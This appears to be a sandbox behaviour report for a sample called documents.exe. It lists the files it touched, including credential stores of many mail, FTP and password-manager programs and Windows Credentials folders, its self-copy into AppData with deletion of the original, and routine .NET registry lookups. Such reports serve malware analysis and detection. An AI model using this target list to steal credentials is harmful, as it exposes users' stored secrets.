C:\Users\Seven01\AppData\Roaming\Pocomail\accounts.ini C:\Users\Seven01\Documents\Pocomail\accounts.ini C:\Users\Seven01\AppData\Roaming\GmailNotifierPro\ConfigData.xml C:\Users\Seven01\AppData\Roaming\DeskSoft\CheckMail C:\Program Files (x86)\WinFtp Client\Favorites.dat C:\Windows\32BitFtp.TMP C:\Windows\32BitFtp.ini C:\FTP Navigator\Ftplist.txt C:\Softwarenetz\Mailing\Daten\mailing.vdt C:\Users\Seven01\AppData\Roaming\Opera Mail\Opera Mail\wand.dat C:\Users\Seven01\Documents\*Mailbox.ini C:\Users\Seven01\Documents\yMail2\POP3.xml C:\Users\Seven01\Documents\yMail2\SMTP.xml C:\Users\Seven01\Documents\yMail2\Accounts.xml C:\Users\Seven01\Documents\yMail\ymail.ini C:\Users\Seven01\AppData\Roaming\TrulyMail\Data\Settings\user.config C:\Users\Seven01\Documents\*.spn C:\Users\Seven01\Desktop\*.spn C:\Users\Seven01\AppData\Roaming\To-Do DeskList\tasks.db C:\Users\Seven01\AppData\Roaming\stickies\images C:\Users\Seven01\AppData\Roaming\stickies\rtf C:\Users\Seven01\AppData\Roaming\NoteFly\notes C:\Users\Seven01\AppData\Roaming\Conceptworld\Notezilla\Notes8.db C:\Users\Seven01\AppData\Roaming\Microsoft\Sticky Notes\StickyNotes.snt C:\Users\Seven01\Documents C:\Users\Seven01\Documents\*.kdbx C:\Users\Seven01\Desktop C:\Users\Seven01\Desktop\*.kdbx C:\Users\Seven01\Documents\*.kdb C:\Users\Seven01\Desktop\*.kdb C:\Users\Seven01\Documents\Enpass C:\Users\Seven01\Documents\My RoboForm Data C:\Users\Seven01\Documents\1Password C:\Users\Seven01\AppData\Local\Temp\Mikrotik\Winbox C:\Users\Seven01\AppData\Local\Temp\NETAPI32.DLL C:\Windows\System32\netapi32.dll C:\Users\Seven01\AppData\Local\Temp\netutils.dll C:\Windows\System32\netutils.dll C:\Users\Seven01\AppData\Local\Temp\srvcli.dll C:\Windows\System32\srvcli.dll C:\Users\Seven01\AppData\Roaming\E62877 C:\Users\Seven01\AppData\Roaming\E62877\73E4A9.lck C:\Users\Seven01\AppData\Roaming\Microsoft\Credentials C:\Users\Seven01\AppData\Roaming\Microsoft\Credentials\* C:\Users\Seven01\AppData\Local\Microsoft\Credentials C:\Users\Seven01\AppData\Local\Microsoft\Credentials\* C:\Users\Seven01\AppData\Roaming\E62877\73E4A9.exe C:\Windows\Temp C:\Windows\sysnative\LogFiles\Scm\eaca24ff-236c-401d-a1e7-b3d5267b8a50
Read Files
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll C:\Users\Seven01\AppData\Local\Temp\documents.exe.config C:\Users\Seven01\AppData\Local\Temp\documents.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll C:\Windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6229_none_d089f796442de10e\msvcr80.dll C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch C:\Windows\assembly\NativeImages_v2.0.50727_32\index126.dat C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll \Device\KsecDD C:\Windows\System32\l_intl.nls C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll C:\Windows\assembly\pubpol28.dat C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni.dll C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\dbfe8642a8ed7b2b103ad28e0c96418a\System.Drawing.ni.dll C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\3afcd5168c7a6cb02eab99d7fd71e102\System.Windows.Forms.ni.dll C:\Windows\assembly\GAC_MSIL\System.Windows.Forms\2.0.0.0__b77a5c561934e089\System.Windows.Forms.dll C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Core\fbc05b5b05dc6366b02b8e2f77d080f1\System.Core.ni.dll C:\Windows\Microsoft.NET\Framework\v2.0.50727\Culture.dll C:\Windows\Microsoft.NET\Framework\v2.0.50727\it\mscorrc.dll C:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\GdiPlus.dll C:\Windows\System32\netapi32.dll C:\Windows\System32\netutils.dll C:\Windows\System32\srvcli.dll C:\Users\Seven01\AppData\Roaming\E62877\73E4A9.lck C:\Windows\sysnative\LogFiles\Scm\eaca24ff-236c-401d-a1e7-b3d5267b8a50
Write Files
C:\Users\Seven01\AppData\Roaming\E62877\73E4A9.lck C:\Users\Seven01\AppData\Roaming\E62877\73E4A9.exe
Delete Files
C:\Users\Seven01\AppData\Local\Temp\documents.exe:Zone.Identifier C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.2688.7335343 C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.2688.7335343 C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.2688.7335500 C:\Users\Seven01\AppData\Roaming\E62877\73E4A9.lck C:\Users\Seven01\AppData\Local\Temp\documents.exe
Keys
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Policy\ HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\v4.0 HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\InstallRoot HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\CLRLoadLogDir HKEY_CURRENT_USER\Software\Microsoft\.NETFramework HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\UseLegacyV2RuntimeActivationPolicyDefaultValue HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\OnlyUseLatestCLR Policy\Standards HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\Standards HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\Standards\v2.0.50727 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Fusion\NoClientChecks HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SideBySide HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\SideBySide\PreferExternalManifest HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SideBySide\AssemblyStorageRoots HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\GCStressStart HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\GCStressStartAtJit HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\DisableConfigCache HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Policy\AppPatch HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\AppPatch\v4.0.30319.00000 HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\AppPatch\v4.0.30319.00000\mscorwks.dll HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\documents.exe HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\CacheLocation HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DownloadCacheQuotaInKB HKEY_CURRENT_USER\Software\Microsoft\Fusion HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\EnableLog HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LoggingLevel HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\ForceLog HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogFailures HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\VersioningLog HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogResourceBinds HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\UseLegacyIdentityFormat HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DisableMSIPeek HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NoClientChecks HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DevOverrideEnable HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Security\Policy\Extensions\NamedPermissionSets HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Security\Policy\Extensions\NamedPermissionSets\Internet HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Security\Policy\Extensions\NamedPermissionSets\LocalIntranet HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-1822907384-1282624486-319450072-1000 HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\v2.0.50727\Security\Policy HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\LatestIndex HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index126 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index126\NIUsageMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index126\ILUsageMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ConfigMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ConfigString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\MVID HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\EvalationData HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ILDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\NIDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\MissingDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\LastModTime HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion\GACChangeNotification\Default HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\mscorlib,2.0.0.0,,b77a5c561934e089,x86 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\43074441\377c1cd0 HKEY_LOCAL_MACHINE\Software\Microsoft\StrongName HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion\PublisherPolicy\Default HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\Latest HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\index28 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\LegacyPolicyTimeStamp HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Windows.Forms__b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ConfigMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ConfigString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\MVID HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\EvalationData HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ILDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\NIDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\MissingDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ConfigMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ConfigString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\MVID HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\EvalationData HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ILDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\NIDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\MissingDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ConfigMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ConfigString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\MVID HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\EvalationData HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ILDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\NIDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\MissingDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Windows.Forms,2.0.0.0,,b77a5c561934e089,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Drawing__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Drawing,2.0.0.0,,b03f5f7f11d50a3a,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System__b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System,2.0.0.0,,b77a5c561934e089,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Xml__b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Xml,2.0.0.0,,b77a5c561934e089,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Configuration__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Configuration,2.0.0.0,,b03f5f7f11d50a3a,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Deployment__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Deployment,2.0.0.0,,b03f5f7f11d50a3a,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Runtime.Serialization.Formatters.Soap__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Runtime.Serialization.Formatters.Soap,2.0.0.0,,b03f5f7f11d50a3a,MSIL 